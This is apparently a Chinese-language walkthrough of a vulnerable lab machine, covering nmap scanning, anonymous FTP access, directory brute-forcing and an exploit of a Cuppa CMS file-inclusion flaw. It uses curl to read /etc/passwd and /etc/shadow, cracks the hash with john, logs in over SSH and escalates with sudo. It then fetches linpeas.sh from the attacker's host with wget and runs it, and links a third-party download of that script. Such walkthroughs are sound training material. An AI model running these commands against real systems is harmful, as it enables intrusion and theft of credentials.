nmap信息枚举
还是先找到靶机ip
用ifconfig看看自己的
发现是192.168.161段。
用nmap扫一下这个段
nmap 192.168.161.0/24 -sP
知道自己的靶机ip了
192.168.161.148
扫描靶机的端口信息
nmap -p- 192.168.161.148
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
靶机端口的详细信息
用nmap的详细命令
nmap -p- 192.168.161.148 -sS -sV -A -T5
发现这些信息
ftp弱口令:
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
|_drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
22端口开放:
OpenSSH 7.2p2 Ubuntu 4ubuntu2.4
其余信息无!
ftp去看看。
进入ftp看一看
ftp 192.168.161.148
账号直接是anonymous
登陆成功,看一看content里面的内容。
里面有1 2 3个txt文件,直接全下载
get 01.txt
get 02.txt
get 03.txt
docs里面有worktodo.txt也下载
get worktodo.txt
这里面的也下载看看
get employee-names.txt
这是01的,没作用
这是02也没有作用
03也没用
这个是work的那个也没用
这个也没用,也就是说ftp下载的东西都没用。
去80端口去查看
dirb一下
dirb http://192.168.161.148/
查找出该页面存在administrator目录:
http://192.168.161.148/administrator/installation/
发现是TitleCuppa CMS框架!CuppaCMS是一套内容管理系统(CMS)!
谷歌搜索:Cuppa CMS exploit
https://www.exploit-db.com/exploits/25971
所以我们访问这个就行
http://192.168.161.148/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
发现没有东西,上网查了一下我们这个是get传参,并没法显示内容,所以我们应该用post的传参。
用kali的curl就行
curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.161.148/administrator/alerts/alertConfigField.php
–data-urlencode:
在新版本的CURL中,提供了新的选项 –data-urlencode,通过该选项提供的参数会自动转义特殊字符。
成功。这里并没有我们要找的,我们要找的应该在shadow里面
curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.161.148/administrator/alerts/alertConfigField.php
看这个最长的,我们把他保存到一个txt里面。
john爆破
我将那个放在了01.txt文件里面
john 01.txt
得到ssh的账号和密码
账号是w1r3s
密码是computer
ssh登陆
ssh w1r3s@192.168.161.148
密码是computer
成功登陆。
发现用sudo -i然后输入密码就能进入root
我已经完成了这个挑战。
扩展
可以利用脚本直接把他靶机里面的信息全部拿到
利用这个文件就行。
在自己虚拟机开一个http的服务
python -m http.server 8081
在ssh里面
cd /tmp
wget http://192.168.161.142:8081/linpeas.sh
chmod +x linpeas.sh
然后运行
./linpeas.sh
就什么内容都有了,哈哈哈。
这个文件放到文章尾
通过百度网盘分享的文件:linpeas.sh
链接:https://pan.baidu.com/s/1JNkAWmMFKTcCNSI6K4CshQ?pwd=xlvu
提取码:xlvu
–来自百度网盘超级会员V5的分享